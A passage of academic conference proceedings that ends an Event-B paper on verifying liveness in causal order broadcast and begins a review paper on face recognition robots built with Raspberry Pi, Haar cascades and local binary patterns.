step. [4] outlines the procedure for the incremental development of Event-B models
through an approach of refinement.

1.1 Event-B and Rodin

The two main components of an Event-B model [5, 6] are contexts and machines [7].
The static part of the model is comprised of contexts which contain sets, axioms, and
constants. Sets can be of two types, carrier, or enumerated. The properties of these
sets and constants are defined by axioms. The behavioral properties of the model are
represented by machines which contain the system variables, theorems, invariants,
and events. The state of the machine is defined by variables. The constraints that
must be applied on the machine’s variables are represented by the invariants of the
machine [4]. First, an abstract machine is modeled, and then, it is refined to intro-
duce more concrete specifications [8]. Every state of the machine during execution
must satisfy all the invariants [9]. The events in the model define how the state of the
machine may evolve. An event comprises of guards and actions. The list of actions of
an event is invoked only if all the guards associated with that event become true [10].
Proof obligations are used to verify the properties of a machine through consistency
checking and refinement checking [7, 11]. Event-B tools discharge prove obligations
using automatic prover or through interaction [7]. The detailed description of nota-
tions of Event-B is given in [12]. Several B tools are available such as Rodin [7],
B-Toolkit [13], Atelier B [14] Click’n’Prove [15]. We have used Rodin platform [7,
16] for our research work. It has various embedded plugins such as model checkers,
provers, proof-obligation generator, UML transformers. Rodin provides a platform
for consistency and refinement checking through generation and discharge of proof
obligations.
Formal Verification of Liveness Properties … 201

1.2 Causal Order Broadcast

The causal order was formally defined by Lamport in [17]. The causal order property
is a combination of FIFO order and local order property [18]. Birman, Schiper, and
Stephenson proposed causal ordering of messages in [19]. FIFO order property [20]
states that “if any site Si broadcasts a message M1 before broadcasting message M2
then each receiving site delivers M1 before M2.” Local order property [20] states
that “if any site Si delivers message M1 before broadcasting message M2 then every
receiving site delivers M1 before M2.” The causal order property states that “if
broadcasting of a message M1 causally precedes broadcasting of a message M2 then
delivery of message M1 at each site should be done before the delivery of message
M2.”
The remaining paper is organized as follows: Section 2 summarizes the literature
review, Section 3 gives the formal analysis of liveness property in causal order broad-
cast systems, Sections 4 and 5 demonstrate the analysis of enabledness preservation
and non-divergence property, respectively, in causal order broadcast systems, and
Section 6 provides a conclusion to the work done.

2 Literature Review

Extensive research has been done in the field of formal modeling, and verification
of various protocols related to distributed systems. Event-B is one such platform for
formal development of distributed system protocols. [12] demonstrates the formal
verification of atomic commitment of distributed transaction. The paper also caters to
the difficulties that arise when updates occur in a replicated database and issues that
occur while maintaining consistency among various replicas of the database. [10]
highlights the formal development of an incremental model of total order broadcast
in distributed transactions using Event-B. Formal verification of safety and liveness
properties in distributed transactions is presented in [23]. Formal development and
verification of causal order-based load balancing protocol using Event-B are shown
in [20]. The details of various message ordering properties such as causal order and
total order are given in [22]. The paper highlights various aspects of causal order
broadcast and total order broadcast through events and invariants. An abstract model
of causal order broadcast is developed, and then, it is refined by adding the details at
each refinement stage. In this paper, we take the work forward by demonstrating the
liveness properties of causal order message passing-systems by ensuring enabled-
ness preservation and non-divergence through various refinements of causal order
broadcast model using Event-B and Rodin platform.
202 P. Yadav et al.

3 Formal Analysis of Liveness Properties in Causal Order


Broadcast Systems

The details of Event-B model of causal order are given in [23]. First, an abstract
machine for reliable broadcast is developed, and then, it is refined abstract causal
order. In the next refinement, we proceed toward vector clocks. The vector clock
rules replace the abstract causal order. The various stages of refinement of causal
order broadcast model are described below.
Abstract Machine: Figure 1 shows the abstract machine for causal order broadcast.
In the abstract machine, PROC and MSG are sets of processes and messages, respec-
tively, and PROC is a finite set. Variables assumed are sender and causaldeliver.
Invariants 1 and 2 give sender and causaldeliver definition as mapping from MSG to
PROC and relation of PROC and MSG, respectively. Invariant 3 states that processes
that delivered the message will be in set of processes that sent the message. In the
Event Broadcast, for any PROC p and MSG m, if m is not previously sent by the
sender process then it is broadcast to all processes, and the variable sender is updated.
In the event Deliver, for any PROC p and MSG m, if message m is sent by sender and
is not delivered by the process then m is delivered by p, and the variable causaldeliver
is updated.

Fig. 1 Abstract machine for


causal order broadcast
Formal Verification of Liveness Properties … 203

First Refinement: Figure 2 shows the first refinement of the causal order broadcast
machine. Typing invariant 4 defines causalorder as relation of MSG to MSG. Here,
ordering is done at the time of sending, so messages ordered will be in the set of
messages sent by the process as shown in invariant 5. Invariants 6 and 7 show that
causal ordering can be imposed only on those messages that have already been sent.
In the broadcast event, when a process p broadcasts a message m, then the updating of
the variable causalorder takes place as per the mappings specified by sender −1 [{p}]
× {m}. It shows that as per the FIFO order, all messages broadcast by the process p
before broadcasting the message m causally precede message m. Similarly, local order
is confirmed by showing the mappings in causaldeliver[{p}] × {m} which signify
that the messages causally delivered to the process p before process p broadcasts
message m also precede message m causally. In the deliver event, message m has not
yet been delivered at process p is ensured by guard 3. Process p belongs to the domain

Fig. 2 Refinement 1 for causal order broadcast


204 P. Yadav et al.

of deliveryorder is ensured by guard 4. Actions 1 and 2 ensure that the message m is


delivered at process p. After the event has occurred, the variables causaldeliver and
deliveryorder are updated.
Second Refinement: In this refinement (Fig. 3), the causal order broadcast system
is refined using vector clocks. The global variable causalorder is replaced by vector
clock rules.
Birman, Schiper, and Stephenson’s protocol [19] are used in our model to update
the vector clock at the sender and receiver processes and to update the timestamp
of the messages. The new variable vtp denotes the vector clock at a process, while
the variable vtm denotes the vector timestamp of a message. The variables vtm and
vtp are defined as an array of vectors in invariants 8 and 9, respectively, where the

Fig. 3 Refinement 2 for causal order broadcast


Formal Verification of Liveness Properties … 205

value for each message and process is initialized as zero. In the broadcast event of
refinement-2, causal order of refinement-1 is replaced by vector clock rules. When
a message is broadcast by a process pp, then the vector clock value of process pp,
vtp(pp)(pp) is incremented by 1, which becomes the vector timestamp of message m.
Total number of messages sent by process pp is denoted by vtp(pp)(pp). In the event
Deliver, a message is delivered to a process only if the receiving process has delivered
all the previous messages from the sender of that message. The vector timestamp of
the receiver process is compared to the vector timestamp of the incoming message to
ensure that all the messages delivered by the sender of that message before sending
it and are also delivered at the receiver process.

4 Analysis of Enabledness Preservation Property

In a model of distributed systems, we need to prove that the system eventually


completes its execution and is free from deadlock. It requires us to prove that if causal
order is followed in the abstract model then it is followed in concrete model as well.
This is ensured by the property of enabledness preservation. To prove enabledness
preservation in an Event-B model, we need to prove that if the guards of one or more
events in the abstraction are triggered then the guards of the one or more events in
the refinement must also be triggered [21].
Let a1 , a2 , a3 … an be the events in the abstraction and let r 1 , r 2 , r 3 … .r n be the
corresponding events in the refined machine. The events r i refine the events ai . Let
rn1 , rn2 … rnk be the new events introduced in the refinement. The weaker notion for
enabledness preservation is given in [23] as:

Grd(a1 ) ∨ Grd(a2 ) . . . ∨ Grd(an ) ⇒ Grd(r1 ) ∨ Grd(r2 ) . . .


∨ Grd(rn ) ∨ Grd(r n 1 ) ∨ Grd(r n 2 ) . . . ∨ Grd(r n k ) (1)

Weaker notion of enabledness preservation as per Eq. (1) means that if the guards
of one of the events are triggered at the abstract level then the guards of one or
more events will also be triggered at the refinement level. The stronger notion of
enabledness preservation as per [23] states that if the guards of an event ai are
enabled in the abstraction then either the guards of its refining event r i or the guards
of one of the newly introduced events must also be enabled Eq. (2).

Grd(ai ) ⇒ Grd(ri ) ∨ Grd(r n 1 ) ∨ Grd(r n 2 ) . . . ∨ Grd(r n k ) (2)

In our model, we have an abstract machine named abstract which is refined by


the machine Refinement 1 which is further refined by the machine Refinement 2. The
machine abstract has two events Broadcast and Deliver. The machine Refinement 1
also has two events Broadcast and Deliver which refine the Broadcast and Deliver
events, respectively, of the abstract machine. We prove the weaker and stronger
206 P. Yadav et al.

notion of enabledness preservation by adding the invariants 10, 11, and 12 in the first
refinement machine Refinement 1.
For weaker notion-Guard(Broadcast) ∨ Guard(Deliver) ⇒
Guard(Broadcast) ∨ Guard(Deliver).
Inv 10: ∀ m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ∨ (m ∈
dom(sender) ∧ (p → m) ∈ / causaldeliver) ⇒
(p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ∨ (m ∈ dom(sender) ∧ (p →
m) ∈/ causaldeliver) ∨ (p ∈ dom(deliveryorder))).
For stronger notion-Guard(Broadcast) ⇒ Guard(Broadcast).
Inv 11: ∀ m,p·((p ∈ PROC)∨(m ∈ MSG) ∨ (m ∈ / dom(sender)) ⇒
(p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender))).
Guard(Deliver) ⇒ Guard(Deliver).
Inv 12: ∀ m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p → m) ∈ /
causaldeliver) ⇒
(p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p → m) ∈ / causaldeliver) ∨
p ∈ dom(deliveryorder)).
The machine Refinement 2 also has two events Broadcast and Deliver which
refine the Broadcast and Deliver events, respectively, of the machine Refinement 1.
Similarly, we add the invariants 13, 14, and 15 to the machine Refinement 2 to prove
the weaker and stronger notion of enabledness preservation.
For weaker notion-Guard(Broadcast) ∨ Guard(Deliver) ⇒
Guard(Broadcast) ∨ Guard(Deliver).
Inv 13: ∀ pp,m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender))∨ (m ∈
dom(sender) ∧ (p → m) ∈ / causaldeliver) ∨ (p ∈ dom(deliveryorder)) ⇒
(pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ∨ {nVTP = VTP(pp) ←{pp →
VTP(pp)(pp) + 1}} ∨ (m ∈ dom(sender)) ∨ ((pp → m) ∈ / causaldeliver) ∨ (∀p·(p ∈
PROC ∧ p = sender(m) ⇒ VTP(pp)(p) ≥ VTM(m)(p))) ∨ (VTP(pp)(sender(m))
= (VTM(m)(sender(m))) − 1)).
For stronger notion- Guard(Broadcast) ⇒ Guard(Broadcast).
Inv 14: ∀m,pp,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ⇒
(pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ∨ (nVTP = VTP(pp)←{pp
→ VTP(pp)(pp) + 1})).
Guard(Deliver) ⇒ Guard(Deliver).
Inv 15: ∀m,pp,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p → m) ∈ /
causaldeliver) ∨ (p ∈ dom(deliveryorder)) ⇒
(pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender)) ∨ ((pp → m) ∈ / causalde-
liver) ∨ (∀p·(p ∈ PROC ∧ p = sender(m) ⇒ VTP(pp)(p) ≥ VTM(m)(p))) ∨
(VTP(pp)(sender(m)) = (VTM(m)(sender(m))) − 1)).
Formal Verification of Liveness Properties … 207

5 Analysis of Non-divergence Property

Non-divergence is a liveness property which states that events which are newly
introduced in the refinement steps do not take control forever, i.e., the new events
should not diverge or run forever. A variable V such that V ∈ N, where N is a set
of natural numbers is used to prove that newly introduced events do not diverge.
The execution of a new event in the refinement decreases the value of the variant,
but the value of variant must never go below zero. In our model of causal order
broadcast, we would like to ensure that a message is never re-broadcast because of
repeated execution of broadcast event. It is also important to prove that each sent
message is delivered to each process only once. A new variable var is introduced in
the abstract model, and the value of var for each message is set to one. The variable
var is initialized as var: = MSG × 1 in the initialization event. Each occurrence
of the broadcast event decreases the value of the variable var and sets it to zero.
Thereby once a message is broadcast, the value of the variable var becomes zero and
it cannot be decreased further. Therefore, if the invariants defined on the variable
var are satisfied, a message once broadcast cannot be broadcast again. Similarly, the
variable, delvar which is added to the abstract model ensures that a message once
delivered by a particular process successfully cannot be redelivered by it.
The invariants corresponding to the variables var and delvar are added to the
abstract model. Invariant 16 shows that variable var is assigned to each message and
is a natural number. Invariant 17 shows that the number of processes in the broadcast
system is finite. Invariant 18 shows that if the value of var for any message is zero
then that message has been broadcast. Invariant 19 states that for a particular message
m, the value of var is always greater than zero, and it cannot be less than zero as var
is a natural number.
Inv 16: var ∈ MSG → NATURAL.
Inv 17: card(PROC) ∈ NATURAL.
Inv 18: ∀(mm) · (mm ∈ MSG ∧ (var(mm) = 0) ⇒ mm ∈ dom(sender)).
Inv 19: ∀(m) · (m ∈ MSG ⇒ var(m) > 0).
Inv 20: delvar ∈ MSG → NATURAL.
Inv 21: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender)∧ causaldeliver−1 [{m}] = PROC
⇒ card(causaldeliver−1 [{m}]) = card(PROC)).
The initial value of delvar for each message is set to the total number of processes
in the system. On occurrence of each Deliver event, the value of delvar is decreased by
one. If a message is delivered to all the processes, the value of delvar for that message
becomes zero. Any re-delivery of the message at a process will set the value of delvar
to a negative value, thereby violating the invariants defined on delvar. Invariant 20
states that each message is assigned with a variable delvar which decreases as the
message is delivered by each process. Invariant 21 states that if a message is broadcast
by the sender and all processes have delivered the message then the number of
processes that delivered the message is equal to the number of processes in the system.
We further add invariants defined on the variables var and delvar to the model. If a
208 P. Yadav et al.

message m is broadcast by any process and all the processes have delivered m then
the value of delvar is zero stated by invariant 22.
Inv 22: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender)∧ card (causaldeliver−1 [{m}]) =
card (PROC) ⇒ delvar(m) = 0).
Inv 23: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender)∧ card (causaldeliver−1 [{m}]) <
card (PROC) ⇒ delvar(m) > 0).
Inv 24: ∀(m) · (m ∈ MSG ∧ (causaldeliver−1 [{m}] = PROC) ⇒ (delvar(m) =
0)).
Inv 25: ∀(m) · (m ∈ MSG ∧ causaldeliver−1 [{m}] ⊂ PROC ⇒ delvar(m) > 0).
Inv 26: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender) ⇒ card (causaldeliver−1 [{m}])
≤ card (PROC)).
Invariant 23 states that if a message m has not been delivered to all the processes
then delvar > 0. This means that message m has not been delivered to some processes.
Invariants 24 and 25 state that if a message has been delivered to all the processes
then the value of delvar is zero else it is more than zero. Similarly, invariant 26 states
that the number of processes a message has been delivered to will always be less than
or equal to the total number of processes in the system. The model and the invariants
shown above were checked successfully using Rodin platform with ProB animator
model checker, and no anomalies were found. This ensures our assumption that in
our model of causal order broadcast each message is broadcast only once, and every
process will deliver each message only once.

6 Conclusions

The liveness property in the Event-B model of causal order broadcast system has
been discussed in this paper. Liveness property expresses that the Event-B model
makes progress. To ensure the property of liveness in the proposed model, we had to
ensure that our model of causal order broadcast is enabledness preserving and non-
divergent. Proving non-divergence in the model of causal order broadcast system
requires us to prove that no message is re-broadcast in our system, and each message
is delivered to each process only once. We have outlined how we can introduce a
variant and how the invariant properties can be constructed on variants. Enabledness
preservation can be proved by proving that when the refined model makes progress,
the abstract model also makes progress. We have outlined the process of construction
of invariant properties to ensure enabledness preservation. This work was carried out
on B Tools, RODIN, and ProB model checker. Both enabledness preservation and
non-divergence properties are conserved in this model of causal order broadcast
system, thus ensuring the liveness property in the model. The proof statistics of the
Event-B model of causal order broadcast system with liveness property are given
below in Table 1:
Formal Verification of Liveness Properties … 209

Table 1 Proof statistics of the proposed model


Machine Total POs No. of POs discharged No. of POs discharged
automatically interactively
Abstract machine 5 5 0
First refinement 33 22 11
Second refinement 36 30 6
Overall 74 57 17
PO—Proof obligations

The model was checked successfully using Rodin platform with ProB animator
model checker, and no anomalies were found. Total 74 proof obligations were
generated and discharged either interactively or automatically.

References

1. Kindler, E. (1994). Safety and liveness properties: A survey. Bulletin of the European
Association for Theoretical Computer Science, 53, 268–272.
2. Lamport, L. (1977). Proving the correctness of multiprocess programs. IEEE Transactions on
Software Engineering, 3(2), 125–143.
3. Abrial, J. R. (1996) The B Book. Assigning programs to meanings. Cambridge University
Press, Cambridge.
4. Butler, M., & Yadav, D. (2008). An incremental development of mondex system in Event-B.
Formal Aspects of Computing, 20(1), 61–77.
5. Bodeveix, J. P., Dieumegard, A., & Filali, M. (2020). Event-B formalization of a variability-
aware component model patterns framework. Science of Computer Programing, 199, 102511.
6. Lahbib, A., et al. (2020). An event-B based approach for formal modelling and verification
of smart contracts. In International Conference on Advanced Information Networking and
Applications. Springer.
7. Metayer, C., Abrial, J. R., & Voison, L. (2005). Event-B language. RODIN deliverables 3.2,
http://rodin.cs.ncl.ac.uk/deliverables/D7.pdf.
8. Suryavanshi, R., & Yadav, D. (2012). Rigorous design of lazy replication system using Event-B.
In International Conference on Contemporary Computing. Springer.
9. Girish C., & Yadav, D. (2010). Analyzing data flow in trustworthy electronic payment systems
using event-B. In International Conference on Data Engineering and Management. Springer.
10. Yadav, D., & Butler, M. (2009). Formal development of a total order broadcast for distributed
transactions using Event-B. Method, Models and Tool for Fault-Tolerance Lecture Notes in
Computer Science (LNCS), 5454, 152–176.
11. Lahouij, A., et al. (2020). An Event-B based approach for cloud composite services verification.
Formal Aspects of Computing, 32(4), 361–393.
12. Yadav, D., & Butler, M. (2006). Rigorous design of fault-tolerant transactions for replicated
database systems using Event-B. LNCSIn M. Butler, C. B. Jones, A. Romanovsky, & E.
Troubitsyna (Eds.), Fault-Tolerant Systems (Vol. 4157, pp. 343–363). Springer.
13. B Core UK Ltd. B-Toolkit Manuals (1999)
14. Steria, Atelier-B User and Reference Manuals (1997)
15. Abrial, J. R., & Cansell, D. (2003) Click’n’Prove—Interactive Proofs within Set Theory.
16. Abrial, J.-R., Butler, M., Hallerstede, S., Hoang, T. S., Mehta, F., & Voisin Rodin, L. (2010). an
open toolset for modelling and reasoning in Event-B. International Journal on Software Tools
for Technology Transfer (STTT), 12(6), 447466.
210 P. Yadav et al.

17. Lamport, L. (1978). Time, clocks, and the ordering of events in a distributed system.
Communication, ACM, 21(7), 558–565.
18. Yadav, D., & Butler, M. (2007). Formal specifications and verification of message ordering
properties in a broadcast system using Event-B. In Technical Report. School of Electronics and
Computer Science, University of Southampton.
19. Birman, K., Schiper, A., & Stephenson, P. (1991). Lightweight causal and atomic group
multicast. ACM Transactions Computer System, 9(3), 272–314.
20. Pooja, Y., Suryavanshi, R., Singh, A. K., & Yadav, D. (2019). Formal verification of causal
order-based load distribution mechanism using Event-B. Data engineering and applications
(pp. 229–241). Springer.
21. Abrial, J.-R. (1996). Extending B without changing it (for developing distributed systems). In
H. Habrias (Ed.), First B Conference.
22. Yadav, D., & Butler, M. Formal development of broadcast systems and verification of ordering
properties using Event-B.
23. Yadav, D., & Butler, M. (2009). Verification of liveness properties in distributed systems.
In International Conference on Contemporary Computing (pp. 625–636). Springer.
A Comparative Study on Face
Recognition AI Robot

Somesh Sunar, Shailendra K. Tripathi, Usha Tiwari, and Harshit Srivastava

Abstract Face recognition, the application of image processing, has gained a lot of
attention. People have started researching and working on it to enhance the field of
automation, security, and surveillance. The main reason behind this hype is the vast
availability of commercial applications and accessibility to the latest technologies.
Though the machine level recognition systems have gained a certain level of perfec-
tion, their success rate can be limited based on the application. This is because the
image captured by the outdoor system is hard to detect and recognize due to change
in light, different background conditions, and variations in the position of the person
or object. So, we can say that the present system is far behind the perfection that
a human possesses. This paper provides information on both still and moving, i.e.,
video-based face recognition. The main reason behind writing this review paper is to
shed light on the existing literature on this topic and add some more value to knowl-
edge gained concerning machine-based face recognition. Most of the system uses
the local binary pattern (LBP) approach to perform face recognition. For detecting
the face in the captured image, the Haar cascade algorithm is used where the person’s
facial feature is extracted and saved in a database for future reference. So, to provide
an effective survey, we have classified the existing method for face recognition and
explored the latest emerging technologies in this field.

Keywords Face recognition robot · Face detection · LBP algorithm · Raspberry


Pi · Haar cascade · Infrared thermometer

1 Introduction

A face recognition robot utilizes a method of image processing for detecting a face
using a camera. The robot [1–5] identifies various essential features of the face

S. Sunar (B) · S. K. Tripathi · U. Tiwari


Department of EECE, Sharda University, Greater Noida, India
H. Srivastava
Highlands, Noida, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 211
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_17
212 S. Sunar et al.

from the captured image and then compares it with the stored data. Various algo-
rithms/methods/techniques are used for recognizing a human face, such as local
binary pattern (LBP), support vector machine (SVM), etc.
Most face recognition systems use PICAMERA camera module to capture the
image, while Raspberry Pi 3 is used to implement face detection and recognition [1–
8]. Adaboost, which was introduced by Paul Viola in 2001, is used for face detection.
This algorithm majorly uses a cascade classifier that comes under a Haar-like feature.
This feature gives them a unique ability to detect a human face, regardless of the
background conditions, the color of the image captured, size, and shape. On the
other hand, it quickly recognizes a face, linear binary pattern algorithm [6–8, 10].
The face’s digital image is immediately divided into pixels, which are later used for
further processing. The identified feature compares pixels to pixels with that of the
features stored in the dataset [11–13]. The robot performs various activities that are
controlled using an Arduino Uno. It detects the motion of any object using a PIR
sensor that initiates the recognition process. It is also responsible for controlling the
robot’s motion using a phone [13–16]. When the human’s face is recognized, an SOS
message (alert message) is sent to the organization’s owner.
The whole process performed by the robot is divided into three stages:
• In the first stage [1–11], a face is detected using the Viola–Jones detection
algorithm.
• Further [5–10], in the second stage, the detected face’s tracking is done using
Kanade- Lucas-Tomasi (KLT).
• Additionally, in the third stage, the vital feature is identified, which sums up the
tracking process. Majorly the whole procedure of tracking a face is an amalga-
mation of detectionfollowed by identifying unique points in a detected face using
any of the algorithms known.

2 Literature Review

In [1], the face recognition is performed with the cascade classification and LBPH
face recognizer method using Python 2.7 with OpenCV library. It offers excellent
accuracy of 92.73%. The paper [2] performs real-time interaction of human and robot
Indore where it processes 11 frames per second and provides 94% recognition rate
using visual tracking architecture and RBF neural network. It performs rapid face
recognition of family members, as each member has a distinct RBF neural network.
Paper [3] presents a comparison between Adaboost and Imaboost. Adaboost, using a
combination of a simple classifier, generates a comparatively strong classifier where
the clonal selection algorithm replaces the best classifier. A combination of AdaBoost
and artificial immune system is proposed as Imaboost, which has enhanced system
processing by improving the classification performance.
In [4], face detection is performed on a live video stream for security in commercial
places. It is designed to perform the detection using the web camera and to track the
detected face using Arduino and OpenCV, where the primary algorithm used is
A Comparative Study on Face Recognition AI Robot 213

AdaBoost and Haar-like feature. The paper by K.Maneesha, N.Shree, D.R.Pranav,


S.K.Sindhu, and C.Gururaj [5] used Arduino and MATLAB using Kanade-Lucas-
Tomasi (KLT) for real-time face recognition but lacked during complicated crowd.
Thus, the whole process is divided into two major categories: Viola–jones is used
to detect the face, and the KLT algorithm is later used to extract the features from
the detected face. It can detect a human face in any video frame until the distance
of 350 cm and moderate light. The paper [6] aims at providing the features that are
the most informative and least possible feature that results in the least data loss. This
process is performed using a genetic programming algorithm and wrapper genetic
programming (WGP).
Using this intelligent mechanism of genetic programming helps in increasing
the probability of finding high-quality reduct. Paper [7] presents a social robot that
performs face detection and tracking with the help of cascade classification and local
binary pattern histogram method along with OpenCV and python 2.7. It contains
12 degrees of freedom motor servos that help control the head of the motor and
the robot’s face. It can later be improved by facilitating emotional expression. To
facilitate face recognition [8], system-on-chip (SOP) is integrated with an FPGA
where a local binary pattern histogram is used to extract the test image’s necessary
features to match the extracted features from that saved in the database. The SoC is
equipped with an ARM processor responsible for receiving the input data stream and
presenting the result as the output with reference to the distance. The robot uses the
Haar cascade algorithm [9] equipped with the raspberry pi, and the camera module
detects a human face. The GSM module added to it sends messages to the user that
contains the person’s information as saved in the database. The Bluetooth module
controls the motion of the robot. IoT is the latest technology that is taking home
automation to another level. Using IoT [10], Raspberry Pi, along with the camera
module, detects a human face, PIR sensor mounted on it detects the movement of
objects nearby. Once the motion is detected, it captures the place’s image and sends
the image to the owner’s smartphone. The paper [13] performs face detection using
the Haar cascade algorithm, but recognizing the detected face uses Eigen and Gabor
filter in videos. The main aim of the proposed method is to reduce the processing
time. The Eigen face method is best and efficient for computational complexity, and
the Gabor filter is best for pose changes. For detection and recognition of images
[14, 15], the Viola–Jones algorithm and back propagation neural network (BPNN)
is used to detect the face, and the latter is used for recognition of the detected face.
There are a few problems in the process, such as typical skin tone, common features,
and gender that differentiate people. The research [16–18] gives the guidelines for
establishing the design of the interface and the HRI of the social robot. It helps
overcome the additional adjustment that is to be made in the final design phase.
214 S. Sunar et al.

3 Implementation

A robot has a specific surveillance cycle, each of which is divided in two states: an
active state and an ideal state [1–5]. During the ideal state, the robot remains in a
stationary state inside the organization, whether it is home or office during daytime,
and is moving around the same compound at night. This is because, in that time
[7–15], the PIR sensor is active and searches for any movement around it. As we
know, the sun radiates infrared radiation continuously; So, if the sun rays fall on the
PIR sensor, it generates an alarm signal even if no movement is detected. During
the daytime, they are placed indoors so that PIR sensor does not directly contact
the sunlight. During the active state, I2C communication is established between
Raspberry Pi and Arduino Uno using a camera module. In the structure made for
the robot, the camera is inclined at an angle of 45 ° with reference to the ground.
At this angle, the camera detects a human face, captures it, and moves to the face
recognition process. When the face gets matched to the face saved in the dataset, it
sends a message to the owner with the name of that person recognized by the robot.
On the other hand, if the face is not matched with that in the dataset, an alert message
is sent through a GSM module.
Various methods are used for detecting the face such as Viola–Jones method [6–
13]. There are a few crucial concepts with the help of which it detects a human
face.
1 Haar feature: This is a feature [14–19], which analyzes the captured image to
find out whether there is a human face or not. It divides the captured image into
two parts: the dark side and the bright side. It creates the average of all the dark
pixels and the average of light pixels, and both the averages are subtracted to
obtain the required pixels.
2 Adaboost algorithm: It is considered to be the easiest and fast process. Viola and
Jones used this algorithm because it increases the performance using elementary
learning. During the Adaboost learning, the output of this is various data that can
be grouped to form a classifier, which can be further used. The classifier contains
a very small feature of the detected face, which is why they are commonly used
to detect the pattern in the whole process.
3 Integral image: The integral image is a vital concept that accelerates the feature
detection process and boosts the pixels’ value from the original image that is
detected. The left side of the image is used for the sum of the pixels above the
threshold voltage. This addition process starts from the top left and to the bottom
right of the image (Fig. 1).

3.1 Local Binary Pattern (LBP) for Face Recognition

One of the many face recognition approaches is local binary pattern (LPB) [3–15].
The binary pixel values at the center are compared with the remaining 8 pixels around
A Comparative Study on Face Recognition AI Robot 215

Fig. 1 Diagram of integral image pixel

it. To match the similarities between the captured image and the image in the dataset,
the LBP method can be used. In this approach, the surrounding pixel values reduce
the value of the center image. It works on a 3 × 3 matrix pixel image. It gives 1 the
result if the value is more than or equal to 0, but it gives 0 as a result if the value
obtained is less than 0. After that, obtained binary values are the 8 surrounding pixels
in 3 × 3 matrix sorted either clockwise or anti-clockwise and then converted into
decimal form to replace the pixel value of the center image (Figs. 2 and 3).
• Detection:
Due to technological advancement, there are various devices such as webcam
and many others that can be used in order to obtain input videos. Now the video
obtained is broken down into multiple frames, and each of the frames are examined
closely to detect any face in it. The detection is carried on all the frames, and once
the face is detected in any of the frames, a box is drawn around the face detected
[17, 18]. Now, the coordinates of the boxes drawn are saved for future reference.
This is performed using MATLAB software. Now the coordinates obtained are
fed into the microcontroller.
• Tracking:

Fig. 2 Local binary pattern calculation

Fig. 3 Block diagram for the Entire Process


216 S. Sunar et al.

Fig. 4 Flowchart for face


tracking

Once the coordinates are fed to the Arduino, the microcontroller tracks the detected
human’s face. Arduino is one of the most popular open-source platforms that has
application based on both software and hardware for controlling the motion of
the robot, servo motor are used, and two such servo motor are interfaced with
a microcontroller for the same purpose [19]. Before performing any task, the
servo motors are calibrated to the center. The coordinates which were fed to a
microcontroller is used to track the face in the specified frame. With the person’s
movement, the position of the webcam also changes, but there is a constraint that
the servo motor rotates only from degree to maximum up to degree [20]. Viola–
Jones operates only on a front-facing faces, so instead of Viola–Jones, the KLT
algorithm can be considered to track the face even in a live video (Fig. 4).

4 Hardware Specification

The small size as that of a credit card and a Wi-Fi module, and a Bluetooth module
that was already present on the Raspberry Pi makes it more profitable to use than
a microcontroller [1–12]. So, Arduino Uno and Raspberry Pi are considered the
most crucial component used in most of the roots. Apart from Raspberry Pi [1–5],
there are also a few most important components such as chassis (body of the robot),
motors, and battery, and at the same time, it also contained motor driver (L293D) for
controlling the movement of the robot [6–11].
Since one of the most critical applications of the robot is sending SMS to the
owner’s number and for the same, a GSM module with SIM900a has been installed.
In order to monitor everything that the robot is recording, processing, and displaying,
a remote display is also used, and it is connected to the root using a Wi-Fi module.
PIR sensor is considered one of the few important components because it initiates
the detection whenever it identifies some movement nearby. After the PIR sensor
detects any motions, it sends a signal to the Arduino board. A signal is sent to the
Raspberry Pi to activate and capture the moving object’s image and initiates the face
recognition and detection process.
A Comparative Study on Face Recognition AI Robot 217

For tracking [1–13], an Arduino and one servo motors were used to employ the
Viola–Jones technique though it has a few restrictions, one among them being that
they operate only on front-facing faces. So, it was later improved and modified by
using the KLT technique to track faces even in live videos. In the modified technique,
the Atmega 328p microcontroller was used along with Arduino and webcam.

5 Software Specification

We can say that software forms the backbone of this robot. Without the software, it
cannot perform any task. As we have already discussed, the robot’s task is divided
into three parts: face detection, face recognition, and generating an alert signal. So,
for face detection and face recognition, programming is done in Python, whereas
programming on Arduino is done for generating an alertsignal.
In [1–4], the Haar cascade is used to perform the face detection which is performed
using the OpenCV tool. In this technique, a dataset contains images with features
(positive image) and images that do not have any feature (negative images), which
can be used to train the classifier tooperate accurately. It gives the most efficient
result because the more we train the robot the better its result. Hence in this process,
it tries to detect a human’s face in a frame of the video, and once the face gets
detected, it makes a box around the face, and the coordinates of the box are saved in
the microcontroller for further process.
For AI-based robots, a dataset needs to be created to be trained so that the more
we train, the more precise it will give the output. For creating the dataset, [1–7]
hundreds of humans’ images are taken and face recognition is performed, where the
face gets detected and saved in the dataset folder. For the robot’s training [8–17], the
local binary pattern (LBP) approach is primarily used.
Equation (1) is used for calculating the pixels of the image:


P−1
 
LBP P,R (X C , YC ) = S g p − gc 2 p
P=0

So, it is observed that for face detection and face recognition, it uses the cascade
algorithm which is performed using OpenCV tool, and an alert signal is generated
using an Arduino IDE. The final robot training using the dataset is done using the
LBP technique to increase its efficiency.
218 S. Sunar et al.

6 Results and Discussion

6.1 Face Recognition System

When it comes to making a face recognition robot, it starts by getting a collection


of human’s facial image which is also known as database (or dataset). Among the
captured image saved in the database, the face needs to be detected using a cascade
classification technique using the OpenCV library tool and python programming
language. Now the face of different people needs to be identified, and for the same
